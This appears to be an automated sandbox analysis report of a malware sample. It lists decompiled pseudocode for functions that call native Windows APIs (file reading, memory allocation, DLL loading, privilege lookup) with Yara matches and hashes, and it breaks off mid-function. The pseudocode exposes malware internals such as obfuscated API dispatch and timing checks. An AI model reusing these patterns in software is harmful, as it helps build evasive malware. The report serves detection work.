                                    			E0041868A(void* __ebx, void* __edx, void* __edi, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, char _a28, intOrPtr _a32, char _a36) {
				intOrPtr _v0;
				void* _t18;
				void* _t31;
				void* _t32;
				intOrPtr* _t33;
				void* _t35;

				_t31 = __edi + 1;
				asm("stosb");
				_t13 = _v0;
				_t33 = _v0 + 0xc48;
				E004191E0(_t31, _t13, _t33,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a36; // 0x413a31
				_t6 =  &_a28; // 0x413d72
				_t12 =  &_a4; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t33))( *_t12, _a8, _a12, _a16, _a20, _a24,  *_t6, _a32,  *_t4, _t32, _t35, _t35); // executed
				return _t18;
			}









                                    0x0041868a
                                    0x0041868e
                                    0x00418693
                                    0x0041869f
                                    0x004186a7
                                    0x004186ac
                                    0x004186b2
                                    0x004186cd
                                    0x004186d5
                                    0x004186d9

                                    APIs
                                    • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID: 1:A$r=A$r=A
                                    • API String ID: 2738559852-4243674446
                                    • Opcode ID: e6bf2d199c16b6d751162161dfb785e3b118e0c1e748dd80b58e2b061eab5fe8
                                    • Instruction ID: 433f86b4603b7a565d6941fd2f73a23f56c414a73004497b6a7b79e7fa74aa9e
                                    • Opcode Fuzzy Hash: e6bf2d199c16b6d751162161dfb785e3b118e0c1e748dd80b58e2b061eab5fe8
                                    • Instruction Fuzzy Hash: C7F0E2B2200209ABCB04DF99CC90EEB77ADEF8C754F058249FA4D97241CA30E851CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00418690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 3 418690-4186a6 4 4186ac-4186d9 NtReadFile 3->4 5 4186a7 call 4191e0 3->5 5->4
                                    C-Code - Quality: 37%
                                    			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                    0x00418693
                                    0x0041869f
                                    0x004186a7
                                    0x004186ac
                                    0x004186b2
                                    0x004186cd
                                    0x004186d5
                                    0x004186d9

                                    APIs
                                    • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID: 1:A$r=A$r=A
                                    • API String ID: 2738559852-4243674446
                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                    • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                    • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 359 409b40-409b69 call 41af70 362 409b6b-409b6e 359->362 363 409b6f-409b7d call 41b390 359->363 366 409b8d-409b9e call 419720 363->366 367 409b7f-409b8a call 41b610 363->367 372 409ba0-409bb4 LdrLoadDll 366->372 373 409bb7-409bba 366->373 367->366 372->373
                                    C-Code - Quality: 100%
                                    			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF70( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B390(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B610( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419720(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                    0x00409b5c
                                    0x00409b5f
                                    0x00409b64
                                    0x00409b69
                                    0x00409b73
                                    0x00409b78
                                    0x00409b7b
                                    0x00409b7d
                                    0x00409b85
                                    0x00409b8a
                                    0x00409b8a
                                    0x00409b91
                                    0x00409b99
                                    0x00409b9c
                                    0x00409b9e
                                    0x00409bb2
                                    0x00000000
                                    0x00409bb4
                                    0x00409bba
                                    0x00409b6e
                                    0x00409b6e
                                    0x00409b6e

                                    APIs
                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Load
                                    • String ID:
                                    • API String ID: 2234796835-0
                                    • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                    • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                                    • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                    • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004185E0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 374 4185e0-418631 call 4191e0 NtCreateFile
                                    C-Code - Quality: 100%
                                    			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                    0x004185ef
                                    0x004185f7
                                    0x0041862d
                                    0x00418631

                                    APIs
                                    • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                    • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                    • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004187C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 377 4187c0-4187fd call 4191e0 NtAllocateVirtualMemory
                                    C-Code - Quality: 100%
                                    			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                    0x004187cf
                                    0x004187d7
                                    0x004187f9
                                    0x004187fd

                                    APIs
                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateMemoryVirtual
                                    • String ID:
                                    • API String ID: 2167126740-0
                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                    • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                    • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041870A, Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E0041870A(void* __eax, void* _a4) {
				intOrPtr _v0;
				long _t9;
				void* _t13;

				asm("insb");
				_push(0x55);
				_t6 = _v0;
				_t2 = _t6 + 0x10; // 0x300
				_t3 = _t6 + 0xc50; // 0x409763
				E004191E0(_t13, _v0, _t3,  *_t2, 0, 0x2c);
				_t9 = NtClose(_a4); // executed
				return _t9;
			}






                                    0x0041870c
                                    0x0041870f
                                    0x00418713
                                    0x00418716
                                    0x0041871f
                                    0x00418727
                                    0x00418735
                                    0x00418739

                                    APIs
                                    • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID:
                                    • API String ID: 3535843008-0
                                    • Opcode ID: 94385ea2607e99e4f23a75cd1ac8a344ae37783ce295fd67e074d6fe845f6f19
                                    • Instruction ID: adb5d7824efa5989c72cc655c2277b3281c8e514d962a6123890b825eb6125c1
                                    • Opcode Fuzzy Hash: 94385ea2607e99e4f23a75cd1ac8a344ae37783ce295fd67e074d6fe845f6f19
                                    • Instruction Fuzzy Hash: CCE08C352402047BE710EB98CC55FD73B59EB48791F108459FA585B282C530EA00C7D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00418710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00418710(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                    0x00418713
                                    0x00418716
                                    0x0041871f
                                    0x00418727
                                    0x00418735
                                    0x00418739

                                    APIs
                                    • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID:
                                    • API String ID: 3535843008-0
                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                    • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                    • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004088D0, Relevance: .1, Instructions: 92COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 93%
                                    			E004088D0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0F0( &_v284, 0x104);
						E0041A760( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DF0(E00413D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                    0x004088db
                                    0x004088e3
                                    0x004088e5
                                    0x004088ea
                                    0x004088ef
                                    0x00408902
                                    0x00408907
                                    0x00408910
                                    0x0040891c
                                    0x0040892f
                                    0x00408934
                                    0x00408937
                                    0x00408940
                                    0x00408952
                                    0x00408957
                                    0x0040895c
                                    0x00000000
                                    0x00000000
                                    0x0040895e
                                    0x00408962
                                    0x00000000
                                    0x00000000
                                    0x00408964
                                    0x00000000
                                    0x00408962
                                    0x00408966
                                    0x00408969
                                    0x0040896f
                                    0x00408971
                                    0x0040897c
                                    0x00408981
                                    0x00408984
                                    0x00408991
                                    0x0040899c
                                    0x0040899e
                                    0x004089a4
                                    0x004089a8
                                    0x004089ab
                                    0x004089ab
                                    0x004089b2
                                    0x004089b5
                                    0x004089ba
                                    0x004089c7
                                    0x004088f6
                                    0x004088f6
                                    0x004088f6

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                    • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                                    • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                    • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004188E3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                    • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateFree
                                    • String ID: 65A
                                    • API String ID: 2488874121-2085483392
                                    • Opcode ID: 6c8c8128c4855ca991e59b4003b406146ec2f9488d046d84f0c217ef94da80e6
                                    • Instruction ID: f0af90bf23ae137f33001e0d1086360710761a1baabbe4536e4bec7e110539d6
                                    • Opcode Fuzzy Hash: 6c8c8128c4855ca991e59b4003b406146ec2f9488d046d84f0c217ef94da80e6
                                    • Instruction Fuzzy Hash: 43018CB5204215AFDB14EFA5DC84DEB376DEF85354F01855AFD088B242CA30E954CBB4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00418A41, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 15 418a41-418a43 16 418a53-418a6a call 4191e0 15->16 17 418a45 15->17 23 418a6f-418a84 LookupPrivilegeValueW 16->23 18 4189d5-4189d7 17->18 19 418a47-418a4e 17->19 21 4189df-4189f4 18->21 22 4189da call 4191e0 18->22 19->16 22->21
                                    C-Code - Quality: 50%
                                    			E00418A41(void* __eax, void* __ebx, signed int __ecx, void* __edx, intOrPtr _a8, WCHAR* _a12, WCHAR* _a16, struct _LUID* _a20) {
				int _t14;
				void* _t24;
				signed int _t28;
				signed int _t29;

				_t29 = _t28 ^ __ecx;
				if(_t29 <= 0) {
					asm("loop 0xffffff90");
					asm("std");
					asm("rcr byte [ebp-0x38], 0x31");
					_push(_t29);
				}
				_t11 = _a8;
				E004191E0(_t24, _a8, _a8 + 0xc8c,  *((intOrPtr*)(_t11 + 0xa18)), 0, 0x46);
				_t14 = LookupPrivilegeValueW(_a12, _a16, _a20); // executed
				return _t14;
			}







                                    0x00418a41
                                    0x00418a43
                                    0x00418a45
                                    0x00418a47
                                    0x00418a4a
                                    0x00418a50
                                    0x00418a51
                                    0x00418a53
                                    0x00418a6a
                                    0x00418a80
                                    0x00418a84

                                    APIs
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LookupPrivilegeValue
                                    • String ID: 1
                                    • API String ID: 3899507212-2212294583
                                    • Opcode ID: 41bf37c81134509337144ca1c81adef433eb69cc6daac1ebcb3bcb6f4b686dab
                                    • Instruction ID: d5abc8786f01bb17d7a6fe162d8270b814f0c07a923b4f552728b3bf6c6c65f9
                                    • Opcode Fuzzy Hash: 41bf37c81134509337144ca1c81adef433eb69cc6daac1ebcb3bcb6f4b686dab
                                    • Instruction Fuzzy Hash: 3301ADB52002056BEB10DF54DC80EEB77A9EF84354F00816AF80857342CA74E954C7E4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004188B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 25 4188b0-4188c6 26 4188cc-4188e1 RtlAllocateHeap 25->26 27 4188c7 call 4191e0 25->27 27->26
                                    APIs
                                    • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID: 65A
                                    • API String ID: 1279760036-2085483392
                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                    • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                    • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 344 407280-4072ca call 41a140 call 41ad20 call 409b40 call 413e50 353 4072cc-4072de PostThreadMessageW 344->353 354 4072fe-407302 344->354 355 4072e0-4072fa call 4092a0 353->355 356 4072fd 353->356 355->356 356->354
                                    C-Code - Quality: 82%
                                    			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A140( &_v67, 0, 0x3f);
				E0041AD20( &_v68, 3);
				_t12 = E00409B40(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092A0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                    0x00407280
                                    0x0040728f
                                    0x00407293
                                    0x0040729e
                                    0x004072ae
                                    0x004072be
                                    0x004072c3
                                    0x004072ca
                                    0x004072cd
                                    0x004072da
                                    0x004072dc
                                    0x004072de
                                    0x004072fb
                                    0x004072fb
                                    0x00000000
                                    0x004072fd
                                    0x00407302

                                    APIs
                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID:
                                    • API String ID: 1836367815-0
                                    • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                    • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                                    • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                    • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004188F0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 380 4188f0-418906 381 41890c-418921 RtlFreeHeap 380->381 382 418907 call 4191e0 380->382 382->381
                                    C-Code - Quality: 100%
                                    			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                    0x004188ff
                                    0x00418907
                                    0x0041891d
                                    0x00418921

                                    APIs
                                    • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                    • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                    • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00418A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00418A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				_t7 = _a4;
				E004191E0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                    0x00418a53
                                    0x00418a6a
                                    0x00418a80
                                    0x00418a84

                                    APIs
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LookupPrivilegeValue
                                    • String ID:
                                    • API String ID: 3899507212-0
                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                    • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                    • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00418922, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 50%
                                    			E00418922(intOrPtr _a4, int _a8) {
				void* _t15;

				asm("adc eax, 0xaf95ccf");
				asm("in al, 0x55");
				_t6 = _a4;
